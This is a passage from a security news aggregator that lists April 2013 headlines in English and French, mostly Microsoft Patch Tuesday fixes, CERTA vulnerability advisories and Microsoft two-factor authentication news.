reduces the impacted number of machines Microsoft has also released mitigation steps to disable the affected ActiveX control Plus, if your users browse with default IE settings, they will be presented the 'gold bar' warning which provides them with an opportunity to opt out of an attack Overall, the only surprise this month is that Microsoft did not release fixes for the Pwn2Own bug This puts them quite a bit behind other browsers that already patched their Pwn2Own bugs http://www.secuobs.com/revue/news/439001.shtmlhttp://www.secuobs.com/revue/news/439001.shtml 2013-04-11 19:26:27 - Network World on Security : When Microsoft acquired PhoneFactor last fall, the handwriting was on the wall for the future of two-factor authentication for the company's consumer cloud offerings Now it appears that handwriting is about to become a reality http://www.secuobs.com/revue/news/438969.shtmlhttp://www.secuobs.com/revue/news/438969.shtml 2013-04-11 03:46:08 - Security Bloggers Network : For those of you who haven t seen me speak, Bluehat generally brings out the best in me and happens to capture it on video and make it available for you Here you go link if you can t see the embedded video below Enjoy Hoff http://www.secuobs.com/revue/news/438804.shtmlhttp://www.secuobs.com/revue/news/438804.shtml 2013-04-11 02:58:21 - Ars Technica Risk Assessment : Spam text made a tempting offer so I let the spammer take control of my PC http://www.secuobs.com/revue/news/438802.shtmlhttp://www.secuobs.com/revue/news/438802.shtml 2013-04-10 23:51:48 - Security Bloggers Network : As you might be aware, Microsoft releases its Security Intelligence Report SIR twice a year to help inform customers on changes in the threat landscape The report includes data from over a billion systems worldwide, regional analysis for 105 c http://www.secuobs.com/revue/news/438780.shtmlhttp://www.secuobs.com/revue/news/438780.shtml 2013-04-10 21:42:27 - Global Security Mag Online : HP annonce une appliance pour entrepôts de données de nouvelle génération qui permet aux entreprises de relever les défis informatiques complexes et de prendre des décisions plus pertinentes tout en réduisant leurs coûts et en accélérant leur croissance HP AppSystem pour Microsoft SQL Server 2012 Parallel Data Warehouse fournit des informations approfondies pour tout type et volumétrie de données, avec une rapidité de l'exécution des requêtes jusqu'à 100 fois plus élevée et une vitesse de balayage - Produits http://www.secuobs.com/revue/news/438743.shtmlhttp://www.secuobs.com/revue/news/438743.shtml 2013-04-10 21:34:47 - threatpost The First Stop for Security News : Microsoft reportedly will implement two-factor authentication on users accounts at some point down the line, according to reports this week read more http://www.secuobs.com/revue/news/438735.shtmlhttp://www.secuobs.com/revue/news/438735.shtml 2013-04-10 19:13:01 - Network World on Security : Microsoft today launched a third wave of 'Scroogled,' its attack ad-based campaign aimed at Google, this time highlighting what it said were privacy flaws in the latter's Android app store http://www.secuobs.com/revue/news/438698.shtmlhttp://www.secuobs.com/revue/news/438698.shtml 2013-04-10 18:17:53 - Les derniers documents du CERTA. : De multiples vulnérabilités ont été corrigées dans Microsoft Internet Explorer Elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance http://www.secuobs.com/revue/news/438677.shtmlhttp://www.secuobs.com/revue/news/438677.shtml 2013-04-10 18:17:53 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft Remote Desktop Client Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance http://www.secuobs.com/revue/news/438676.shtmlhttp://www.secuobs.com/revue/news/438676.shtml 2013-04-10 18:17:53 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft SharePoint Elle permet à un attaquant de provoquer une atteinte à la confidentialité des données http://www.secuobs.com/revue/news/438675.shtmlhttp://www.secuobs.com/revue/news/438675.shtml 2013-04-10 18:17:53 - Les derniers documents du CERTA. : De multiples vulnérabilités ont été corrigées dans le noyau de Windows Elles permettent à un attaquant de provoquer une élévation de privilèges http://www.secuobs.com/revue/news/438674.shtmlhttp://www.secuobs.com/revue/news/438674.shtml 2013-04-10 18:17:53 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft Active Directory Elle permet à un attaquant de provoquer un déni de service à distance http://www.secuobs.com/revue/news/438673.shtmlhttp://www.secuobs.com/revue/news/438673.shtml 2013-04-10 18:17:53 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft CSRSS Elle permet à un attaquant de provoquer une exécution de code arbitraire, un déni de service et une élévation de privilèges http://www.secuobs.com/revue/news/438672.shtmlhttp://www.secuobs.com/revue/news/438672.shtml 2013-04-10 18:17:53 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft Windows Defender Elle permet à un attaquant de provoquer une élévation de privilèges http://www.secuobs.com/revue/news/438671.shtmlhttp://www.secuobs.com/revue/news/438671.shtml 2013-04-10 18:17:53 - Les derniers documents du CERTA. : Une vulnérabilité a été corrigée dans Microsoft HTML Sanitization Component Elle permet à un attaquant de provoquer une élévation de privilèges http://www.secuobs.com/revue/news/438670.shtmlhttp://www.secuobs.com/revue/news/438670.shtml 2013-04-10 18:17:53 - Les derniers documents du CERTA. : De multiples vulnérabilités ont été corrigées dans Microsoft Kernel-Mode Driver Elles permettent à un attaquant de provoquer une élévation de privilèges http://www.secuobs.com/revue/news/438669.shtmlhttp://www.secuobs.com/revue/news/438669.shtml 2013-04-10 09:15:37 - Help Net Security News : WatchDox Apps for WatchDox Enterprise and Enterprise ES is the first offering to grant enterprise users secure Microsoft Office collaboration capabilities via any desktop, laptop or mobile device, inc http://www.secuobs.com/revue/news/438579.shtmlhttp://www.secuobs.com/revue/news/438579.shtml 2013-04-10 02:59:23 - Security Bloggers Network : Get a strong pot of coffee on, April's Patch Tuesday has arrived In the latest round of security updates, Microsoft has released patches for nine security vulnerabilities, two of them considered 'critical' http://www.secuobs.com/revue/news/438543.shtmlhttp://www.secuobs.com/revue/news/438543.shtml